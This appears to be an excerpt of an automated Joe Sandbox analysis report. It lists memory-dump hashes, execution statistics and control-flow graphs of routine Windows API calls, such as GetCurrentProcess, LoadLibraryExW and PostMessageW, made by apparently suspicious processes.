                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                • Instruction Fuzzy Hash: 9791A271E002169BEB28DF6DC889ABEFBE5FF4C320F54451AE955E72C4E73089818791
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$@
                                                • API String ID: 0-1194432280
                                                • Opcode ID: 62bcec01cf40b6d5309fdef71a45226ea49ef5667ee0ab4687e4e71801a76f57
                                                • Instruction ID: 7e5972e44cdd7518fcaa101ebe1deca91af4f53c9fa707221903119987c2c69d
                                                • Opcode Fuzzy Hash: 62bcec01cf40b6d5309fdef71a45226ea49ef5667ee0ab4687e4e71801a76f57
                                                • Instruction Fuzzy Hash: E6812D71D012699BDB76CF54CC49BEEB7B4AB48714F0041EAEA19B7280E7705E84CFA0

                                                Execution Graph

                                                Execution Coverage:6%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:90
                                                Total number of Limit Nodes:8
                                                execution_graph 18279 b0d690 DuplicateHandle 18280 b0d726 18279->18280 18292 b0d040 18293 b0d086 GetCurrentProcess 18292->18293 18295 b0d0d1 18293->18295 18296 b0d0d8 GetCurrentThread 18293->18296 18295->18296 18297 b0d115 GetCurrentProcess 18296->18297 18298 b0d10e 18296->18298 18299 b0d14b 18297->18299 18298->18297 18300 b0d173 GetCurrentThreadId 18299->18300 18301 b0d1a4 18300->18301 18281 70f13a8 18282 70f1533 18281->18282 18283 70f13ce 18281->18283 18283->18282 18286 70f1628 PostMessageW 18283->18286 18288 70f1621 18283->18288 18287 70f1694 18286->18287 18287->18283 18289 70f1628 PostMessageW 18288->18289 18290 70f1624 18288->18290 18291 70f1694 18289->18291 18290->18289 18291->18283 18302 b04668 18303 b0467a 18302->18303 18304 b04686 18303->18304 18308 b04779 18303->18308 18313 b03e34 18304->18313 18306 b046a5 18309 b0479d 18308->18309 18317 b04888 18309->18317 18321 b04879 18309->18321 18314 b03e3f 18313->18314 18329 b05c44 18314->18329 18316 b07048 18316->18306 18319 b048af 18317->18319 18318 b0498c 18319->18318 18325 b044b4 18319->18325 18323 b04888 18321->18323 18322 b0498c 18322->18322 18323->18322 18324 b044b4 CreateActCtxA 18323->18324 18324->18322 18326 b05918 CreateActCtxA 18325->18326 18328 b059db 18326->18328 18330 b05c4f 18329->18330 18333 b05c64 18330->18333 18332 b070ed 18332->18316 18334 b05c6f 18333->18334 18337 b05c94 18334->18337 18336 b071c2 18336->18332 18338 b05c9f 18337->18338 18341 b05cc4 18338->18341 18340 b072c5 18340->18336 18342 b05ccf 18341->18342 18344 b085cb 18342->18344 18347 b0ac79 18342->18347 18343 b08609 18343->18340 18344->18343 18351 b0cd68 18344->18351 18356 b0acb0 18347->18356 18359 b0aca0 18347->18359 18348 b0ac8e 18348->18344 18352 b0cd1b 18351->18352 18353 b0cd6e 18351->18353 18352->18343 18354 b0cdbd 18353->18354 18383 b0cf28 18353->18383 18354->18343 18363 b0ada8 18356->18363 18357 b0acbf 18357->18348 18360 b0acb0 18359->18360 18362 b0ada8 2 API calls 18360->18362 
18361 b0acbf 18361->18348 18362->18361 18364 b0adb9 18363->18364 18365 b0addc 18363->18365 18364->18365 18371 b0b040 18364->18371 18375 b0b031 18364->18375 18365->18357 18366 b0afe0 GetModuleHandleW 18368 b0b00d 18366->18368 18367 b0add4 18367->18365 18367->18366 18368->18357 18372 b0b054 18371->18372 18374 b0b079 18372->18374 18379 b0a130 18372->18379 18374->18367 18376 b0b040 18375->18376 18377 b0a130 LoadLibraryExW 18376->18377 18378 b0b079 18376->18378 18377->18378 18378->18367 18380 b0b220 LoadLibraryExW 18379->18380 18382 b0b299 18380->18382 18382->18374 18384 b0cf35 18383->18384 18385 b0cf6f 18384->18385 18387 b0bae0 18384->18387 18385->18354 18388 b0bae5 18387->18388 18390 b0dc88 18388->18390 18391 b0d2dc 18388->18391 18390->18390 18392 b0d2e7 18391->18392 18393 b05cc4 2 API calls 18392->18393 18394 b0dcf7 18393->18394 18394->18390

                                                Control-flow Graph

                                                control_flow_graph 504 b0d031-b0d0cf GetCurrentProcess 508 b0d0d1-b0d0d7 504->508 509 b0d0d8-b0d10c GetCurrentThread 504->509 508->509 510 b0d115-b0d149 GetCurrentProcess 509->510 511 b0d10e-b0d114 509->511 513 b0d152-b0d16d call b0d618 510->513 514 b0d14b-b0d151 510->514 511->510 517 b0d173-b0d1a2 GetCurrentThreadId 513->517 514->513 518 b0d1a4-b0d1aa 517->518 519 b0d1ab-b0d20d 517->519 518->519
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 00B0D0BE
                                                • GetCurrentThread.KERNEL32 ref: 00B0D0FB
                                                • GetCurrentProcess.KERNEL32 ref: 00B0D138
                                                • GetCurrentThreadId.KERNEL32 ref: 00B0D191
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1768075210.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_b00000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: c63d47f729a7eeec6d6d7b0c0aa968e708a056402677c08c3debde51e71e2c6f
                                                • Instruction ID: 666b0356d22ab5cfdc0951285c5406b765c86f3e54fb27bf7db4b51b39866956
                                                • Opcode Fuzzy Hash: c63d47f729a7eeec6d6d7b0c0aa968e708a056402677c08c3debde51e71e2c6f
                                                • Instruction Fuzzy Hash: 325146B09003498FDB14DFA9D548B9EBFF1AF89304F20846AE019B73A0DB759984CB65

                                                Control-flow Graph

                                                control_flow_graph 526 b0d040-b0d0cf GetCurrentProcess 530 b0d0d1-b0d0d7 526->530 531 b0d0d8-b0d10c GetCurrentThread 526->531 530->531 532 b0d115-b0d149 GetCurrentProcess 531->532 533 b0d10e-b0d114 531->533 535 b0d152-b0d16d call b0d618 532->535 536 b0d14b-b0d151 532->536 533->532 539 b0d173-b0d1a2 GetCurrentThreadId 535->539 536->535 540 b0d1a4-b0d1aa 539->540 541 b0d1ab-b0d20d 539->541 540->541
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 00B0D0BE
                                                • GetCurrentThread.KERNEL32 ref: 00B0D0FB
                                                • GetCurrentProcess.KERNEL32 ref: 00B0D138
                                                • GetCurrentThreadId.KERNEL32 ref: 00B0D191
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1768075210.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_b00000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 676be0d87901e37a6db6d5a780cc0e5f223428507e5d43ffcc0b26f746c66e39
                                                • Instruction ID: e0841c094e9137dd5e18cc66ae59f8938c3444d01f4bdd4b5ec67495bc33ee95
                                                • Opcode Fuzzy Hash: 676be0d87901e37a6db6d5a780cc0e5f223428507e5d43ffcc0b26f746c66e39
                                                • Instruction Fuzzy Hash: E75134B09003098FDB14DFA9D948B9EBFF1EF89314F208469E419A73A0DB759984CB65

                                                Control-flow Graph

                                                control_flow_graph 572 b0ada8-b0adb7 573 b0ade3-b0ade7 572->573 574 b0adb9-b0adc6 call b0a0cc 572->574 576 b0ade9-b0adf3 573->576 577 b0adfb-b0ae3c 573->577 580 b0adc8 574->580 581 b0addc 574->581 576->577 583 b0ae49-b0ae57 577->583 584 b0ae3e-b0ae46 577->584 629 b0adce call b0b040 580->629 630 b0adce call b0b031 580->630 581->573 585 b0ae59-b0ae5e 583->585 586 b0ae7b-b0ae7d 583->586 584->583 588 b0ae60-b0ae67 call b0a0d8 585->588 589 b0ae69 585->589 591 b0ae80-b0ae87 586->591 587 b0add4-b0add6 587->581 590 b0af18-b0af94 587->590 593 b0ae6b-b0ae79 588->593 589->593 622 b0afc0-b0afd8 590->622 623 b0af96-b0afbe 590->623 594 b0ae94-b0ae9b 591->594 595 b0ae89-b0ae91 591->595 593->591 598 b0aea8-b0aeaa call b0a0e8 594->598 599 b0ae9d-b0aea5 594->599 595->594 601 b0aeaf-b0aeb1 598->601 599->598 603 b0aeb3-b0aebb 601->603 604 b0aebe-b0aec3 601->604 603->604 605 b0aee1-b0aeee 604->605 606 b0aec5-b0aecc 604->606 613 b0aef0-b0af0e 605->613 614 b0af11-b0af17 605->614 606->605 608 b0aece-b0aede call b0a0f8 call b0a108 606->608 608->605 613->614 624 b0afe0-b0b00b GetModuleHandleW 622->624 625 b0afda-b0afdd 622->625 623->622 626 b0b014-b0b028 624->626 627 b0b00d-b0b013 624->627 625->624 627->626 629->587 630->587
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00B0AFFE
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1768075210.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_b00000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 70dec4425ce96781c0720d53a862fe1099d1d2ba64de2e432ec906965d7e4dae
                                                • Instruction ID: 16148a5a68c60a0d9b55217bc7c27891eb01bd94427a13fbeffb3d9754b41ddd
                                                • Opcode Fuzzy Hash: 70dec4425ce96781c0720d53a862fe1099d1d2ba64de2e432ec906965d7e4dae
                                                • Instruction Fuzzy Hash: 0C814670A00B058FDB24DF29D44179ABBF1FF88304F108A6DD08AD7A91E775E84ACB91

                                                Control-flow Graph

                                                control_flow_graph 631 b0590c-b05916 632 b05918-b059d9 CreateActCtxA 631->632 634 b059e2-b05a3c 632->634 635 b059db-b059e1 632->635 642 b05a4b-b05a4f 634->642 643 b05a3e-b05a41 634->643 635->634 644 b05a60 642->644 645 b05a51-b05a5d 642->645 643->642 647 b05a61 644->647 645->644 647->647
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 00B059C9
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1768075210.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_b00000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: c9424ea0264cc99c789a3769113b8c7063e1793446880dd21f125673157e065d
                                                • Instruction ID: 9e0da638e20eb22e1faa40de58b218828e2c4b71759c3d4375460f2ac1006c41
                                                • Opcode Fuzzy Hash: c9424ea0264cc99c789a3769113b8c7063e1793446880dd21f125673157e065d
                                                • Instruction Fuzzy Hash: 9B41E1B0D00619CFDB24CFA9C8846CEBBF5BF49304F2480AAD418AB295DB756985CF90

                                                Control-flow Graph

                                                control_flow_graph 648 b044b4-b059d9 CreateActCtxA 651 b059e2-b05a3c 648->651 652 b059db-b059e1 648->652 659 b05a4b-b05a4f 651->659 660 b05a3e-b05a41 651->660 652->651 661 b05a60 659->661 662 b05a51-b05a5d 659->662 660->659 664 b05a61 661->664 662->661 664->664
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 00B059C9
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1768075210.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_b00000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: ee20a770010ba97838ff3d34b5db5bcfdbf3a4c17d5533d6b24189fbc071de59
                                                • Instruction ID: 46d39f2f82371597baedc08f5e9a68d951f4938d0bfa00ea4332214b8a849385
                                                • Opcode Fuzzy Hash: ee20a770010ba97838ff3d34b5db5bcfdbf3a4c17d5533d6b24189fbc071de59
                                                • Instruction Fuzzy Hash: 7241B2B0D0061DCFDB24DFA9C88469EBBF5BF48304F2481AAE418AB255DB756945CF90

                                                Control-flow Graph

                                                control_flow_graph 665 b0d689-b0d724 DuplicateHandle 666 b0d726-b0d72c 665->666 667 b0d72d-b0d74a 665->667 666->667
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B0D717
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1768075210.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_b00000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 94856884539b98c27bf5396ee4b777ea0b7c21f282d60e53ef6068c5f87c0dcb
                                                • Instruction ID: d3b9c8799886216313c0a656a87db5c47f9d6af96d60cc6c5436c11b2dd61035
                                                • Opcode Fuzzy Hash: 94856884539b98c27bf5396ee4b777ea0b7c21f282d60e53ef6068c5f87c0dcb
                                                • Instruction Fuzzy Hash: FF21E4B59002599FDB10CFAAD584AEEBFF4EB48324F24846AE954B3350D374A944CF60

                                                Control-flow Graph

                                                control_flow_graph 670 b0d690-b0d724 DuplicateHandle 671 b0d726-b0d72c 670->671 672 b0d72d-b0d74a 670->672 671->672
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B0D717
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1768075210.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_b00000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: e2f3d7a4bb7e913d3e3d443626c288d6593daa44a90fb50ada5964b273b215a5
                                                • Instruction ID: 93cd30230437be59379c2dcc33c789197c35db0ab404a99105a814fbbd4dfca0
                                                • Opcode Fuzzy Hash: e2f3d7a4bb7e913d3e3d443626c288d6593daa44a90fb50ada5964b273b215a5
                                                • Instruction Fuzzy Hash: 6721E2B59002489FDB10CFAAD984ADEBFF8EB48320F14801AE958A3350D374A940CFA4

                                                Control-flow Graph

                                                control_flow_graph 675 b0a130-b0b260 677 b0b262-b0b265 675->677 678 b0b268-b0b297 LoadLibraryExW 675->678 677->678 679 b0b2a0-b0b2bd 678->679 680 b0b299-b0b29f 678->680 680->679
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B0B079,00000800,00000000,00000000), ref: 00B0B28A
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1768075210.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_b00000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: a704e0872945e6edd945a61ef59470313f2e5b7fd6b4123286ef3c8262594b4f
                                                • Instruction ID: fefabfabc5a9971fb860ad23752ac6729cbbd835424d1785018c089bc5e31422
                                                • Opcode Fuzzy Hash: a704e0872945e6edd945a61ef59470313f2e5b7fd6b4123286ef3c8262594b4f
                                                • Instruction Fuzzy Hash: BA11E2B69002099FDB20CF9AD444ADEFFF4EB88320F10846AE559A7250C375A945CFA5

                                                Control-flow Graph

                                                control_flow_graph 683 b0b218-b0b260 684 b0b262-b0b265 683->684 685 b0b268-b0b297 LoadLibraryExW 683->685 684->685 686 b0b2a0-b0b2bd 685->686 687 b0b299-b0b29f 685->687 687->686
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B0B079,00000800,00000000,00000000), ref: 00B0B28A
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1768075210.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_b00000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: a58ecd675b7adcd75712aa03bdd9d232ad83d9f92708df8a63df53682bc55cb9
                                                • Instruction ID: 200293edfe98c4c07945630452e476f32201631388cf5cb94f3ffe233510f460
                                                • Opcode Fuzzy Hash: a58ecd675b7adcd75712aa03bdd9d232ad83d9f92708df8a63df53682bc55cb9
                                                • Instruction Fuzzy Hash: E01112B69002498FDB10CF9AD444ADEFFF4EB88320F14846AD459A7350C375A945CFA4

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 690 b0b2c0-b0b2c8 691 b0b269-b0b297 LoadLibraryExW 690->691 692 b0b2ca-b0b2dd 690->692 694 b0b2a0-b0b2bd 691->694 695 b0b299-b0b29f 691->695 696 b0b2e4-b0b2f0 692->696 697 b0b2df-b0b2e3 692->697 695->694 701 b0b2f2-b0b2f9 696->701 702 b0b2fa-b0b30f call b0a0e8 696->702
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B0B079,00000800,00000000,00000000), ref: 00B0B28A
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1768075210.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_b00000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 6cddbd9ba08dbbbfcb462a6a238de6371ecee5adfdba5ef4b70a5ec408cf022a
                                                • Instruction ID: cd0ad7511657f0ed64e4b6c855ac52ff687dea70448af18a4b202d1d01f3570d
                                                • Opcode Fuzzy Hash: 6cddbd9ba08dbbbfcb462a6a238de6371ecee5adfdba5ef4b70a5ec408cf022a
                                                • Instruction Fuzzy Hash: 0701DF729043048FDB108FADD804BCEBFF4EF5A324F14809AE158D72A1C3B9A845CBA5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 706 70f1621-70f1622 707 70f1628-70f1692 PostMessageW 706->707 708 70f1624-70f1626 706->708 709 70f169b-70f16af 707->709 710 70f1694-70f169a 707->710 708->707 710->709
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 070F1685
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1807192793.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_70f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 80832df05b27e54595d3e73a374f455747e602fd0583284a8ac2b822d22eb9c9
                                                • Instruction ID: 72fb2aaf93f8e34d4cef4f6604ebf9392b55c89d933df13f79925c7aa3cabf81
                                                • Opcode Fuzzy Hash: 80832df05b27e54595d3e73a374f455747e602fd0583284a8ac2b822d22eb9c9
                                                • Instruction Fuzzy Hash: 221122B5800389DFDB10CF9AD884BDEBFF8EB48320F24841AE558A7600C375A584CFA5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 712 b0af98-b0afd8 713 b0afe0-b0b00b GetModuleHandleW 712->713 714 b0afda-b0afdd 712->714 715 b0b014-b0b028 713->715 716 b0b00d-b0b013 713->716 714->713 716->715
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00B0AFFE
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1768075210.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_b00000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: a5567bd2bf757fc5770d5c3732f2da968287b352dea692f481fbf9d83503a28b
                                                • Instruction ID: 431d252bf4dd142cfa53585ffbdf3b16e74d0122872c21fd7a89e649c784d708
                                                • Opcode Fuzzy Hash: a5567bd2bf757fc5770d5c3732f2da968287b352dea692f481fbf9d83503a28b
                                                • Instruction Fuzzy Hash: 151110B6C003498FCB20CF9AD444BDEFBF4EB88324F10846AD469A7250D375A545CFA1
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 070F1685
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1807192793.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_70f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 8aa12cafe65ad89900d09b9666552aef9d58f1231b31e80e601a4f78ff44f23b
                                                • Instruction ID: 8df52447d339c9195b59409d2d1538d0fb1d057ccaf28327e02baa28c04aebde
                                                • Opcode Fuzzy Hash: 8aa12cafe65ad89900d09b9666552aef9d58f1231b31e80e601a4f78ff44f23b
                                                • Instruction Fuzzy Hash: F61112B5800349DFDB10CF9AD885BDEFBF8EB48324F20841AE558A7600C375A984CFA5
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1767625032.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_98d000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aaf95585ba8220fa108b53cadd612a1147a7df50d8cc38f91afb1dffb6ac5b1f
                                                • Instruction ID: 6b4be670874afbfacc8018e10eb7f760a02556348f304e3e4c753bf84d4baa7a
                                                • Opcode Fuzzy Hash: aaf95585ba8220fa108b53cadd612a1147a7df50d8cc38f91afb1dffb6ac5b1f
                                                • Instruction Fuzzy Hash: 2221C171505240DFDB05EF14D980F26BF65FB98318F24C56AE9094A39AC33AD856CBA1
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1767666781.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_99d000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2d838e46078ea7b87d4dd9b6278415388b9af336665133fb48b031c21c341b28
                                                • Instruction ID: db115e86e47775a99e2bb9ae61379b3ed41951b4b0116649cad5a86972b6f925
                                                • Opcode Fuzzy Hash: 2d838e46078ea7b87d4dd9b6278415388b9af336665133fb48b031c21c341b28
                                                • Instruction Fuzzy Hash: 3A21F271604200DFDF14DF28D9C4B26BBA5FB98314F24C969D84A4B296C33BD847CA61
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1767666781.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_99d000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a2c724f12380cda2090247ebdf8e53f88d453b91ab233c60bcde5f00d3cb5978
                                                • Instruction ID: e8dea7e3599b384330e39f5ebb83059436ad4368f430d0299e7a520011a05f8c
                                                • Opcode Fuzzy Hash: a2c724f12380cda2090247ebdf8e53f88d453b91ab233c60bcde5f00d3cb5978
                                                • Instruction Fuzzy Hash: DC212671504200EFDF05DF18DAC0B2ABBA9FB94314F20CA6DE9094B296C33AD846CB61
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1767666781.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_99d000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b0f3bbd2f5edca58883f8d2c80465efc9cf5b10ce80715f4c6ceff05a7acde5b
                                                • Instruction ID: 850d14cf27e75906a573e7d5ba01a36a1cdcc973a40967ae3e8fc063803de788
                                                • Opcode Fuzzy Hash: b0f3bbd2f5edca58883f8d2c80465efc9cf5b10ce80715f4c6ceff05a7acde5b
                                                • Instruction Fuzzy Hash: 39215E755093808FDB12CF24D9D4715BF71EB56314F28C5EAD8498F6A7C33A980ACB62
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1767625032.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_98d000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                • Instruction ID: ec7c23e9c81083cf06f9bffea725b74a898947c80c3532c119f9eabcbe1c9a31
                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                • Instruction Fuzzy Hash: 61110372404280CFCB02DF10D5C4B16BF71FB94318F24C6AAE8090B75AC336D85ACBA1
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1767666781.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_99d000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction ID: d68d71861e3c40c46f3cad03cd7d6f6503d32b6177b4ddba4461d3f8a84b681f
                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction Fuzzy Hash: 98118B75504280DFDB16CF14D5C4B19BBA1FB94314F24C6AAD8494B696C33AD84ACB61

                                                Execution Graph

                                                Execution Coverage:0.1%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:5
                                                Total number of Limit Nodes:1
                                                execution_graph 61504 1162b60 LdrInitializeThunk 61505 1162c00 61507 1162c0a 61505->61507 61508 1162c11 61507->61508 61509 1162c1f LdrInitializeThunk 61507->61509

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 1162c0a-1162c0f 1 1162c11-1162c18 0->1 2 1162c1f-1162c26 LdrInitializeThunk 0->2
                                                APIs
                                                • LdrInitializeThunk.NTDLL(0117FD4F,000000FF,00000024,01216634,00000004,00000000,?,-00000018,7D810F61,?,?,01138B12,?,?,?,?), ref: 01162C24
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a283ee241973d20a64bc7301b761d1c13090e05b88268497dc44042106a35e5a
                                                • Instruction ID: 6f95fda90829e7cc92d16866cb438b0c781fc5a6699eab2012741425aa1bce24
                                                • Opcode Fuzzy Hash: a283ee241973d20a64bc7301b761d1c13090e05b88268497dc44042106a35e5a
                                                • Instruction Fuzzy Hash: 39B09B719015C5C9DA15F764470C717791477D0701F25C071D2030651F4739C1D1E275

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 7 11635c0-11635cc LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
